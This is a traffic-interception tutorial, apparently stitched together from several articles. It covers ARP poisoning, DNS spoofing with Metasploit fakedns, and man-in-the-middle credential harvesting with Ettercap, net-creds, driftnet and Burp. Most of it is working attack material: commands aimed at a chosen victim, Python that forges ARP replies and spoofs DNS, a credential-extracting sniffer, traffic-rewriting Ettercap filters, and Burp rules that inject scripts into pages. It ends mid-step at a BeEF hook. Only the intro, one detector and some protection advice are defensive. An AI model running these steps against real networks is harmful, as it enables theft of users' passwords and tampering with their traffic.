How hackers redirect traffic. Redirecting SSH and HTTP traffic

Interception of data over the network means obtaining information from a remote computing device without the sender or receiver intending it: a user's personal information, messages, records of the websites they visit. Data can be captured either by spyware running on the endpoint or by network sniffers.

Spyware is software that records the information transmitted over the network from a specific workstation or device.

A sniffer is a program or a hardware device that captures and analyzes the traffic passing through a network segment. Because a sniffer sees session cookies and credentials sent in the clear, it lets an attacker join an existing web session and perform operations on behalf of the computer's owner.

If the captured data is not relayed in real time, spyware produces reports that are convenient to view and analyze later.

Network eavesdropping may be organized legally or carried out illegally. The main international instrument defining the legality of such acquisition of information is the Convention on Cybercrime, opened for signature in Budapest, Hungary, in 2001. The legal requirements of individual states vary slightly, but the key principles are the same in all countries.

Classification and methods of intercepting data over the network

In accordance with the above, interception of information over the network can be divided into two types: authorized and unauthorized.

Authorized data capture is carried out for various purposes, from protecting corporate information to ensuring state security. The grounds for such an operation are set by legislation; it is performed by special services, law enforcement officers, specialists from administrative bodies and company security departments.

There are international standards for data interception. The European Telecommunications Standards Institute has consolidated a number of technical processes into a single standard (ETSI ES 201 158, "Telecommunications security; Lawful Interception (LI); Requirements for network functions") on which information interception is based. The result is a system architecture that lets intelligence specialists and network administrators legally obtain data from the network. The architecture covers wired and wireless voice calling, e-mail correspondence, voice over IP and SMS exchange.

Unauthorized interception is carried out by intruders who want confidential data, passwords, corporate secrets, addresses of machines on the network and so on. To achieve this, attackers usually use a network traffic analyzer, a sniffer. This program or hardware-software device gives the attacker the ability to capture and analyze information on the network the victim is connected to, including SSL/TLS-encrypted traffic if the attacker can substitute the server certificate (this only succeeds when the client trusts the substituted certificate or the user clicks through the warning; certificate pinning defeats it). Traffic can be captured in several ways:

  • listening on a network interface in promiscuous mode,
  • inserting an interceptor inline into a break in the link,
  • mirroring the traffic (for example, a switch SPAN port) to a sniffer,
  • conducting an active attack that diverts the traffic.

There are also more sophisticated techniques that let an attacker intrude into network communication and modify data. One of them is bogus ARP replies (ARP poisoning). The attacker sends forged ARP messages so that the victim's ARP cache associates the gateway's IP address with the attacker's MAC address (and, for two-way interception, the gateway's cache associates the victim's IP with the same MAC); the victim's traffic then passes through the attacker's machine before being forwarded. A related method is gateway spoofing: the attacker substitutes his own address for the router's IP address, for example with a rogue DHCP server or an ICMP redirect. If the attacker knows how the victim's local network is organized, he can easily arrange for the user's machine to send its traffic to his IP address. TCP session hijacking is another effective interception method: the attacker desynchronizes an established session by injecting TCP segments with the expected sequence numbers into the victim's connection; the session is then taken over and continued by the attacker instead of the client.
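The ARP poisoning described above, as an added example that is not part of the original article: it builds the forged "is-at" reply an attacker sends to the victim (Ettercap sends such replies in both directions), and shows the check a defender can run over captured frames to spot a binding change. All MAC and IP addresses are constructed for the example; sending the frame on a real link would need a raw socket and is deliberately left out.

```python
# Added example (not from the article): the forged ARP reply an attacker
# sends to poison a victim's cache, and the check a defender can run over
# captured frames to spot it. All MAC and IP addresses are constructed.
import struct

ETH_P_ARP = 0x0806
ARP_REPLY = 2

# constructed lab addresses
GATEWAY_IP, GATEWAY_MAC = "192.168.1.1", "aa:bb:cc:00:00:01"
VICTIM_IP, VICTIM_MAC = "192.168.1.33", "aa:bb:cc:00:00:33"
ATTACKER_MAC = "de:ad:be:ef:00:01"


def mac_bytes(mac: str) -> bytes:
    return bytes(int(x, 16) for x in mac.split(":"))


def ip_bytes(ip: str) -> bytes:
    return bytes(int(x) for x in ip.split("."))


def build_arp_reply(sender_mac, sender_ip, target_mac, target_ip) -> bytes:
    """Ethernet II frame carrying an ARP 'is-at' reply: 'sender_ip is at
    sender_mac', unicast to target_mac. Poisoning = putting the attacker's
    MAC in sender_mac while keeping the gateway's IP in sender_ip."""
    eth = mac_bytes(target_mac) + mac_bytes(sender_mac) + struct.pack("!H", ETH_P_ARP)
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, ARP_REPLY)   # hw=Ethernet, proto=IPv4
    arp += mac_bytes(sender_mac) + ip_bytes(sender_ip)
    arp += mac_bytes(target_mac) + ip_bytes(target_ip)
    return eth + arp


def parse_arp(frame: bytes):
    """Return the sender binding of an ARP frame, or None for anything else."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETH_P_ARP:
        return None
    htype, ptype, hlen, plen, op = struct.unpack("!HHBBH", frame[14:22])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    return {
        "op": op,
        "sender_mac": ":".join(f"{b:02x}" for b in frame[22:28]),
        "sender_ip": ".".join(str(b) for b in frame[28:32]),
    }


def detect_poisoning(frames, trusted=None):
    """Track IP->MAC bindings seen in ARP traffic and report every change.
    `trusted` seeds the table with known bindings (e.g. the gateway from a
    static ARP entry), so even the first forged reply is caught."""
    table = dict(trusted or {})
    alerts = []
    for frame in frames:
        arp = parse_arp(frame)
        if arp is None:
            continue
        ip, mac = arp["sender_ip"], arp["sender_mac"]
        previous = table.get(ip)
        if previous is not None and previous != mac:
            alerts.append((ip, previous, mac))
        table[ip] = mac
    return alerts


def lab_capture():
    """A legitimate gateway reply followed by the attacker's forged one."""
    return [
        build_arp_reply(GATEWAY_MAC, GATEWAY_IP, VICTIM_MAC, VICTIM_IP),
        build_arp_reply(ATTACKER_MAC, GATEWAY_IP, VICTIM_MAC, VICTIM_IP),
    ]


if __name__ == "__main__":
    for ip, old, new in detect_poisoning(lab_capture()):
        print(f"ARP binding for {ip} changed from {old} to {new}")
```

The detector is the logic behind tools such as arpwatch: a binding that flips from the real gateway MAC to another one is the signature of the attack. Seeding the table with a static gateway entry matters, because without it the first forged reply a fresh sensor sees looks like a legitimate first announcement.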

Object of influence

The targets of data interception can be government agencies, industrial enterprises, commercial organizations and ordinary users. Inside an organization, traffic capture may be implemented to protect the network infrastructure. Special services and law enforcement agencies can carry out mass interception of information from many different owners, depending on their task.

As for cybercriminals, any user or organization can become a target in order to obtain the data transmitted over the network. With authorized access the informational content of the captured data is what matters, while an attacker is more interested in data that can be used to steal money, or valuable information that can later be sold.

Most often, the victims of interception by cybercriminals are users connecting to a public network, for example a Wi-Fi hotspot in a cafe. The attacker joins the session using a sniffer, replaces data and steals personal information. More details on how this happens are given in the article below.

Threat Source

Authorized interception in companies and organizations is performed by the operators of the public network infrastructure. Their activity is aimed at protecting personal data, trade secrets and other important information. On legal grounds, the transfer of messages and files can be monitored by special services, law enforcement agencies and various government bodies to ensure the safety of citizens and the state.

Attackers perform illegal interception. To avoid becoming a victim, follow a few expert recommendations. Do not perform operations that require authentication or transfer sensitive data while connected to public networks. Prefer encrypted networks and, better still, a personal 3G/LTE modem. When transferring personal data, use HTTPS or a personal VPN tunnel. Note that WPA2 encryption on a hotspot only protects the wireless hop and does not stop another client of the same network from running ARP poisoning against you; only end-to-end encryption (TLS or a VPN) protects against that.

It is possible to protect a computer from network-traffic interception with cryptography and anti-sniffer tools; wired rather than wireless access also reduces the risk.

Proxying iOS applications that use native web sockets

In this article we look at proxying the traffic of iOS applications that use native web sockets to talk to their server. It will be useful to pentesters who need to intercept confidential information sent by iOS applications in non-standard ways, because the default proxy settings on the device may not be sufficient to intercept the traffic of some applications.

Recently, during another pentest, I came across an application that sent information to port 20xx of a web server. Its traffic could not be intercepted by changing the default settings (Settings -> Wi-Fi -> HTTP Proxy -> Manual) and pointing them at a proxy. One reason this does not work is that the application uses native web sockets to communicate with the server instead of the UIWebView class, so it ignores the system HTTP proxy. For more information on how web sockets are set up, see this article.

There is a workaround, however: DNS spoofing to direct all of the application's traffic, on any port, through a proxy such as Burp. This article is divided into three parts:

  1. Sniffing traffic with Wireshark to find the IP address and port of the server.
  2. DNS spoofing and forwarding all traffic to the machine where the proxy is installed.
  3. Interception of traffic using a proxy server after performing DNS spoofing.

Below is a step-by-step procedure for intercepting the traffic of iOS applications that use native web sockets.

1. Create a wireless access point and connect the device to it. (Note: the machine must be connected to Ethernet or otherwise to the Internet, since the Wi-Fi interface will be used for the hotspot. This article explains how to set up a hotspot on a Windows machine.)

2. Launch a network sniffer (for example, Wireshark) and look for traffic on non-standard ports.

a. Filter the traffic so that only packets going to the server's IP address remain (ip.dst == <server IP>).

b. Find the port number the traffic is sent to.

Figure 1: Finding the non-standard port to which the application sends traffic

3. Launch the fakedns module in the Metasploit console (use auxiliary/server/fakedns) and set the following options:

a. set SRVHOST <wireless access point IP>

b. set SRVPORT 53, set TARGETACTION BYPASS, set TARGETDOMAIN www.apple.com (Note: with TARGETACTION=BYPASS the TARGETDOMAIN is resolved normally and every other name is answered with TARGETHOST, so all traffic except that for www.apple.com is redirected to us.)

c. set TARGETHOST <wireless access point IP>

Figure 2: DNS server setup using the fakedns module (in Metasploit)

4. Configure Burp to listen for the device's incoming traffic on the specific ports and redirect it to the server and port found earlier.

a. Go to Proxy -> Options -> Add; set "Bind to port" to the port the application sends to (one of the non-standard TCP ports found with Wireshark).

b. Bind to all interfaces.

c. On the Request handling tab, set the server's hostname in the "Redirect to host" field.

d. On the same tab, set the corresponding port number in the "Redirect to port" field.

e. If the traffic is sent over HTTPS, enable "Force use of SSL" (the device must trust Burp's CA certificate, and an application that pins its server certificate will refuse the connection).

f. Click OK and repeat all of the above for every port the application sends to; in other words, each port needs its own proxy listener. Since the application is not proxy-aware, also enable "Support invisible proxying" on the Request handling tab so that Burp accepts connections that do not use proxy-style request syntax.

Figure 3: Configuring listening and redirecting traffic

5. Configure the network settings on the device:

a. In Wi-Fi -> DHCP, set DNS to the IP address of the access point (so the device's lookups go to the fake DNS server).

b. In the HTTP proxy settings, set the IP address of the access point and the port on which Burp's ordinary listener is configured (these settings proxy standard HTTP traffic; the web-socket traffic reaches Burp through the DNS redirect instead).

Figure 4: IP and DNS configuration on the device

6. Type "run" (or "exploit") in the Metasploit console. The fake DNS server starts answering the device's lookups, and the intercepted traffic from the non-standard ports appears in Burp.

The described method can be used to work around problems with intercepting the traffic of iOS applications that transmit it in non-standard ways.
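The decision logic of step 3, as an added example rather than Metasploit's own fakedns code: every A query is answered with the hotspot address, except names on the bypass list, which are forwarded to a real resolver, exactly the TARGETACTION=BYPASS / TARGETDOMAIN behaviour the procedure relies on. The hotspot IP, the bypass domain and the upstream resolver are assumptions for illustration.

```python
# Added example (not from the article or from Metasploit): the decision logic
# of a fake DNS server in the spirit of fakedns with TARGETACTION=BYPASS.
# Every A query is answered with the hotspot IP except names in BYPASS,
# which are passed to a real resolver. Addresses are assumed for illustration.
import socket
import struct

SPOOF_IP = "192.168.137.1"          # assumed: the hotspot / Burp machine (TARGETHOST)
BYPASS = {"www.apple.com"}          # TARGETDOMAIN: resolved normally, not spoofed
UPSTREAM = ("1.1.1.1", 53)          # assumed real resolver for bypassed names
QTYPE_A = 1


def build_query(name: str, txid: int = 0x1234) -> bytes:
    """Standard recursive A query, as a client (or the iOS device) sends it."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    qname = b"".join(bytes([len(lbl)]) + lbl.encode("ascii") for lbl in name.split(".")) + b"\x00"
    return header + qname + struct.pack("!HH", QTYPE_A, 1)


def parse_qname(msg: bytes, off: int):
    labels = []
    while True:
        ln = msg[off]
        if ln == 0:
            return ".".join(labels), off + 1
        if ln & 0xC0:
            raise ValueError("compressed name in question section")
        labels.append(msg[off + 1:off + 1 + ln].decode("ascii"))
        off += 1 + ln


def decide(query: bytes):
    """Return (qname, response). response is None when the name must be
    bypassed, i.e. forwarded to the real resolver unchanged."""
    txid, _flags, qdcount, _, _, _ = struct.unpack("!HHHHHH", query[:12])
    if qdcount != 1:
        return None, None
    qname, off = parse_qname(query, 12)
    qtype, qclass = struct.unpack("!HH", query[off:off + 4])
    if qname.lower() in BYPASS or qtype != QTYPE_A or qclass != 1:
        return qname, None
    # QR=1, RD=1, RA=1, no error; copy the question; one answer whose name is
    # a compression pointer back to offset 12 (the question name).
    header = struct.pack("!HHHHHH", txid, 0x8180, 1, 1, 0, 0)
    answer = b"\xc0\x0c" + struct.pack("!HHIH", QTYPE_A, 1, 60, 4) + socket.inet_aton(SPOOF_IP)
    return qname, header + query[12:off + 4] + answer


def answer_ip(response: bytes) -> str:
    """The A record in a response built by decide() is its last four bytes."""
    return socket.inet_ntoa(response[-4:])


def serve(bind_ip: str = SPOOF_IP, port: int = 53):
    """Run the responder (needs root for port 53). Not exercised offline."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.bind((bind_ip, port))
    while True:
        query, client = sock.recvfrom(512)
        try:
            qname, resp = decide(query)
        except (ValueError, IndexError, struct.error):
            continue
        spoofed = resp is not None
        if not spoofed:               # BYPASS: ask the real resolver and relay its answer
            up = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
            up.settimeout(3)
            try:
                up.sendto(query, UPSTREAM)
                resp, _ = up.recvfrom(4096)
            except socket.timeout:
                continue
            finally:
                up.close()
        print(f"{client[0]} {qname} -> {SPOOF_IP if spoofed else 'real resolver'}")
        sock.sendto(resp, client)


if __name__ == "__main__":
    serve()
```

Run it on the hotspot machine instead of the Metasploit module if you want to see exactly which names the application resolves; only A queries are faked, so AAAA lookups and anything else are relayed untouched, which is why the device should be given an IPv4-only path to the proxy.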

Ettercap Alternatives

Ettercap is the most popular man-in-the-middle program, but is it the best? Throughout these instructions you will see that Ettercap is almost never used alone: some other program is always lined up with it in a traffic-processing chain. Perhaps this adds flexibility; in general the approach is at the heart of UNIX: one program performs one task, and the user combines programs to get the desired result. It keeps the code easier to maintain, and such small "bricks" can be assembled into a system of any complexity. However, having five consoles open with different tasks, all aimed at one result, is not very convenient: it is simply harder, there is a chance of making a mistake at some stage, and then the whole configured system runs idle.

net-creds sniffs:

  • visited URLs
  • sent POST requests
  • logins/passwords from HTTP forms
  • logins/passwords for HTTP basic authentication
  • HTTP searches
  • FTP logins/passwords
  • IRC logins/passwords
  • POP logins/passwords
  • IMAP logins/passwords
  • Telnet logins/passwords
  • SMTP logins/passwords
  • SNMP community strings
  • NTLMv1/v2 hashes in all supported protocols (HTTP, SMB, LDAP, etc.)
  • Kerberos

It is a good replacement for a whole chain of interception tools; driftnet is simpler in this respect: it only shows intercepted images.
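What a credential sniffer such as net-creds actually does with the bytes it captures, as an added example that is not net-creds' own code: parse a reassembled HTTP request for the visited URL, HTTP basic authentication and form or GET credentials, and pull USER/PASS out of the cleartext dialogue that FTP and POP3 share. The sample payloads are constructed for the example; hosts and accounts are fictitious.

```python
# Added example (not net-creds' own code): the parsing a credential sniffer
# performs over reassembled TCP payloads for HTTP (basic auth, form and GET
# parameters) and for the USER/PASS dialogue that FTP and POP3 share. The
# sample payloads are constructed; hosts and accounts are fictitious.
import base64
import re
from urllib.parse import parse_qs, urlsplit

USER_KEYS = ("username", "user", "login", "email", "uname", "log")
PASS_KEYS = ("password", "pass", "passwd", "pwd")

# constructed samples
SAMPLE_POST = (
    b"POST /login HTTP/1.1\r\nHost: example.test\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\nContent-Length: 29\r\n\r\n"
    b"user=alice&password=s3cret%21"
)
SAMPLE_BASIC = (
    b"GET /admin/?q=1 HTTP/1.1\r\nHost: example.test\r\n"
    b"Authorization: Basic YWxpY2U6c2VjcmV0\r\n\r\n"
)
SAMPLE_FTP = (
    b"220 ftp ready\r\nUSER bob\r\n331 Password required\r\n"
    b"PASS hunter2\r\n230 Logged in\r\n"
)


def parse_http_request(payload: bytes):
    head, _, body = payload.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, path, _ = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def creds_from_form(query: str):
    """Pick the first field that looks like a user name and the first that
    looks like a password out of a urlencoded string."""
    fields = {k.lower(): v[0] for k, v in parse_qs(query).items()}
    user = next((fields[k] for k in USER_KEYS if k in fields), None)
    password = next((fields[k] for k in PASS_KEYS if k in fields), None)
    return (user, password) if user and password else None


def extract_http(payload: bytes):
    """Visited URL plus every credential found in one HTTP request."""
    method, path, headers, body = parse_http_request(payload)
    found = {"url": "http://" + headers.get("host", "?") + path, "creds": []}
    auth = headers.get("authorization", "")
    if auth.lower().startswith("basic "):
        # Basic auth is base64(user:password), i.e. cleartext on the wire
        user, _, password = base64.b64decode(auth[6:]).decode("latin-1").partition(":")
        found["creds"].append(("http-basic", user, password))
    if method == "POST" and "x-www-form-urlencoded" in headers.get("content-type", ""):
        form = creds_from_form(body.decode("latin-1"))
        if form:
            found["creds"].append(("http-form",) + form)
    get = creds_from_form(urlsplit(path).query)
    if get:
        found["creds"].append(("http-get",) + get)
    return found


FTP_USER = re.compile(rb"^USER (\S+)", re.M)
FTP_PASS = re.compile(rb"^PASS (\S+)", re.M)


def extract_user_pass(stream: bytes):
    """FTP and POP3 both send USER <name> / PASS <secret> in the clear."""
    user, password = FTP_USER.search(stream), FTP_PASS.search(stream)
    if user and password:
        return user.group(1).decode("latin-1"), password.group(1).decode("latin-1")
    return None
```

The field-name heuristics are the weak point of every such tool: a login form that names its inputs differently is missed, which is why net-creds also records every POST body and lets you read them yourself.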

Enable IP forwarding on your machine so that intercepted traffic is passed on to its real destination:

echo "1" > /proc/sys/net/ipv4/ip_forward

Run Ettercap with the GUI (-G):

ettercap -G

Now open the Hosts menu, which has a Scan for hosts item. After the scan completes, select Hosts list:

As Target 1 select the router (Add to Target 1), as Target 2 the device you want to attack (Add to Target 2).

Here the first hitch may arise, especially if there are many hosts. In various tutorials, including the video above, the authors log into the target machine (for some reason it is always Windows) and run a command there to look up its IP address on the local network. Clearly that option is not available in real conditions.

If you scan with nmap, you can get some additional information about the hosts, namely the manufacturer of the network card:

nmap -sn 192.168.1.0/24

If that is still not enough, run a scan with OS detection (it needs root privileges):

nmap -O 192.168.1.0/24

As you can see, the machine with IP 192.168.1.33 turned out to be Windows; if that is not a sign from above, what is? 😉

That is the one we add as the second target.

Now go to the Mitm menu, select ARP poisoning... and check the Sniff remote connections box.

Start harvesting. In one window launch

net-creds

and in another (both programs can be run without options)

driftnet

Data collection begins immediately.

On the right side, driftnet has opened another window that shows captured images. In the net-creds window, we see visited sites and intercepted passwords:

1.2 Ettercap + Burp Suite

3. View data (websites visited and captured passwords) in Ettercap

In the View menu the Connections and Profiles tabs are available. You can also check Resolve IP addresses. Connections are, of course, connections. Ettercap collects in-memory profiles for each host it discovers; users and passwords are collected there. Profiles with captured account data (passwords) are marked with a cross:

Do not rely too much on profiles: only intercepted logins and passwords for FTP and other services whose messages the program can unambiguously interpret as credentials are marked there. This does not include, for example, HTTP basic authentication or logins and passwords entered into web forms.

In Connections, the most promising data is marked with an asterisk:

You can double click on these entries to view the details:

To avoid searching for these asterisks through the entire list, sort by this field and they will all be at the top or bottom:

Caught basic authentication:

Login-password for Yandex (highlighted below):

These are the intercepted credentials for Vkontakte:

Also, the most interesting data is collected in the lower console:

If you want to save the program's results, use these options (specify them when starting Ettercap):

Logging options:
  -w, --write <file>          write captured data to a pcap file
  -L, --log <logfile>         write all traffic to this logfile
  -l, --log-info <logfile>    write only passive information to this logfile
  -m, --log-msg <logfile>     write all messages to this logfile
  -c, --compress              use gzip compression for log files

4. Data substitution on the fly in Ettercap

4.1 Using Custom Ettercap Filters

Note: In all my testing, the Ettercap filters did not work. It is hard to tell whether the problem is my hands, a hardware quirk or a bug in the program itself... But for version 0.8.2 (the latest at the moment) there is a bug report about problems with filters. In general, judging by the bug reports and forums, the filters either break often or have not worked at all for a long time. There is a branch that was modified 5 months ago, https://github.com/Ettercap/ettercap/tree/filter-improvements, i.e. filter-improvements. A wide variety of tests were run against this branch and against the version from the repository, various filters were tested under different conditions, a lot of time was spent, but there was no result. By the way, to install the filter-improvements branch on Kali Linux you need to do this:

sudo apt-get remove ettercap-graphical ettercap-common
sudo apt-get install git debhelper bison check cmake flex ghostscript libbsd-dev libcurl4-openssl-dev libgtk2.0-dev libltdl-dev libluajit-5.1-dev libncurses5-dev libnet1-dev libpcap-dev libpcre3-dev libssl-dev libgtk-3-dev ghostscript groff libtool libpcre3 libncurses5-dev
git clone -b filter-improvements https://github.com/Ettercap/ettercap.git
cd ettercap/
mkdir build
cd build
cmake -DENABLE_PDF_DOCS=On ../
make
sudo make install

In general, if your filters do not work, you are not alone. In an Ettercap guide I cannot skip the topic of filters, so they will be covered anyway.

So far we have used Ettercap only for ARP spoofing, which is a very superficial use of it. With custom filters we can intervene and change traffic on the fly. Filters are written in separate files and must be compiled with the etterfilter program before use. Although the documentation linked above is short, together with the examples below it lets you write quite interesting filters.

Let's create our first filter; it will replace all images with this one:

Copy the following into a file named img_replacer.filter:

if (ip.proto == TCP && tcp.dst == 80) {
    if (search(DATA.data, "Accept-Encoding")) {
        replace("Accept-Encoding", "Accept-Rubbish!");
        # note: the replacement string is the same length as the original
        msg("zapped Accept-Encoding!\n");
    }
}
if (ip.proto == TCP && tcp.src == 80) {
    replace("src=", "src=\"http://www.irongeek.com/images/jollypwn.png\" ");
    replace("SRC=", "src=\"http://www.irongeek.com/images/jollypwn.png\" ");
    replace("src =", "src=\"http://www.irongeek.com/images/jollypwn.png\" ");
    replace("SRC =", "src=\"http://www.irongeek.com/images/jollypwn.png\" ");
    msg("Filter Ran.\n");
}

Compile the file:

etterfilter img_replacer.filter -o img_replacer.ef

Compilation results:

etterfilter 0.8.2 copyright 2001-2015 Ettercap Development Team

 14 protocol tables loaded:
	DECODED DATA udp tcp esp gre icmp ipv6 ip arp wifi fddi tr eth

 13 constants loaded:
	VRRP OSPF GRE UDP TCP ESP ICMP6 ICMP PPTP PPPOE IP6 IP ARP

 Parsing source file 'img_replacer.filter'  done.

 Unfolding the meta-tree  done.

 Converting labels to real offsets  done.

 Writing output to 'img_replacer.ef'  done.

 -> Script encoded into 18 instructions.

The -F switch tells the program to load the filter from the file that follows it. After compilation our filter file is named img_replacer.ef, so the command becomes:

ettercap -G -F img_replacer.ef

Note: when you monitor web traffic, the packets you see may be compressed. For filters to work, Ettercap needs plain-text traffic. Web pages are compressed because the browser advertises "Accept-Encoding: gzip, deflate"; if the server honours it, the response body is compressed and the filter's string matches will never fire.

Below is a filter that blanks out the encoding names in the request, forcing the server to reply in plain text:

if (ip.proto == TCP && tcp.dst == 80) {
    if (search(DATA.data, "gzip")) {
        replace("gzip", "    ");
        # note: four spaces in the replacement string
        msg("whited out gzip\n");
    }
}
if (ip.proto == TCP && tcp.dst == 80) {
    if (search(DATA.data, "deflate")) {
        replace("deflate", "       ");
        # note: seven spaces in the replacement string
        msg("whited out deflate\n");
    }
}

The syntax for writing filters is described in detail in the documentation; here are a few more examples:

# replace text in a packet
if (ip.proto == TCP && search(DATA.data, "lol")) {
    replace("lol", "smh");
    msg("filter ran");
}

# show a message if the tcp port is 22
if (ip.proto == TCP) {
    if (tcp.src == 22 || tcp.dst == 22) {
        msg("SSH packet\n");
    }
}

# log all telnet traffic, also execute ./program per packet
if (ip.proto == TCP) {
    if (tcp.src == 23 || tcp.dst == 23) {
        log(DATA.data, "./logfile.log");
        exec("./program");
    }
}

# log all traffic except http
if (ip.proto == TCP && tcp.src != 80 && tcp.dst != 80) {
    log(DATA.data, "./logfile.log");
}

# some packet payload operations
if (DATA.data + 20 == 0x4142) {
    DATA.data + 20 = 0x4243;
} else {
    DATA.data = "modified";
    DATA.data + 20 = 0x4445;
}

# drop all packets containing "ettercap"
if (search(DECODED.data, "ettercap")) {
    msg("some one is talking about us...\n");
    drop();
    kill();
}

# write decrypted ssh packets matching a regular expression
if (ip.proto == TCP) {
    if (tcp.src == 22 || tcp.dst == 22) {
        if (regex(DECODED.data, ".*login.*")) {
            log(DECODED.data, "./decrypted_log");
        }
    }
}

# killing packets
if (ip.ttl < 5) {
    msg("The packet will die soon\n");
}

# the same for IPv6, with a trivial test first to make sure these really are IPv6 packets
if (eth.proto == IP6 && ipv6.hl < 5) {
    msg("The IPv6 packet will die soon\n");
}

# compare a string at the given offset
if (DATA.data + 40 == "ette") {
    log(DATA.data, "./logfile");
}

# inject a file after the specified packet
if (tcp.src == 21 && search(DATA.data, "root")) {
    inject("./fake_response");
}

# replace the whole packet with another one
if (tcp.src == 23 && search(DATA.data, "microsoft")) {
    drop();
    inject("./fake_telnet");
}

# modify binary data using an external program
if (udp.dst == 53 && pcre_regex(DATA.data, ".*\x03com\x00.*")) {
    log(DATA.data, "/tmp/payload");
    drop();
    execinject("/bin/sed 's/\x03com\x00/\x02my\x04page\x02de\x00/g' /tmp/payload");
    udp.len += 7;
    exec("/bin/rm /tmp/payload");
    msg("faked");
}

# filter only the specified IP address
if (ip.src == "192.168.0.2") {
    drop();
}

# do the same for IPv6
if (ipv6.src == "2001:db8::1") {
    drop();
}

# combine IPv4 and IPv6
if (eth.proto == IP && ip.dst == "192.168.0.2") {
    msg("drop IPv4");
    drop();
}
if (eth.proto == IP6 && ipv6.dst == "2001:db8::1") {
    msg("drop IPv6");
    drop();
}

# translate tcp packets from port 80 to 81
if (tcp.dst == 80) {
    tcp.dst -= 1;
    tcp.dst += 2;
}

# find and mangle ESP packets
if (ip.proto == ESP) {
    DATA.data = "DEADDECAF";
}

4.2 Data spoofing with Burp

We launch Ettercap and Burp as described in paragraph 1.2 or in paragraph 2.2.

In Burp go to Proxy -> Options and find Match and Replace. Click Add to add a new rule. The rule type can be one of:

  • Request header: a header of the request
  • Request body: the body of the request
  • Response header: a header of the response
  • Response body: the body of the response
  • Request param name: the name of a request parameter
  • Request param value: the value of a request parameter
  • Request first line: the first line of the request

If you need to change data sent with the GET method, note that it travels in the request line (the URL), not in a body, so use Request first line or Request param name/value.

HTML markup also has a head (the head tag). The headers mentioned above have nothing to do with it: they are the HTTP headers of the request or response. If you want to change the content of an HTML page, always choose Response body rather than Response header, even if you are going to change the content of the head tag (for example, the title).

If you are not familiar with regular expressions, that is, in principle, not a problem: HTML forgives a lot, and what it does not understand it simply ignores, so you can get away with rough patterns. If you do know how to use regular expressions, then you have my respect.

For example, let's create a new rule and change its type from Request header to Response body. In the rule itself, set Match to

<title>.*<\/title>

and Replace to

<title>no title</title>

Check the box Regex match.

Now on every site (without HTTPS) the title will read "no title":

Insert an arbitrary line after the body tag (it becomes the first line of the page text). Request header is again changed to Response body. We change

Check the box Regex match.

In the upper right corner (depending on the layout) the text "I am cool!" appears. You can insert CSS, JavaScript code, any text, anything at all. You can even remove everything from the page and then fill it with your own content; it all depends on your imagination.

There was an idea to slightly modify each form so that its data is sent both to the original server and to the attacker's server (a multi-submit for every form). But on reflection, if the transmitted data is not encrypted and we already have access to it, we see it anyway and do not need to send it to any server. Nevertheless, if someone needs it, here is a really working example of sending data from one form to several servers at once.

5. BeEF hookup

To start using BeEF's features, we need to embed a JavaScript file in the HTML, usually a line like:


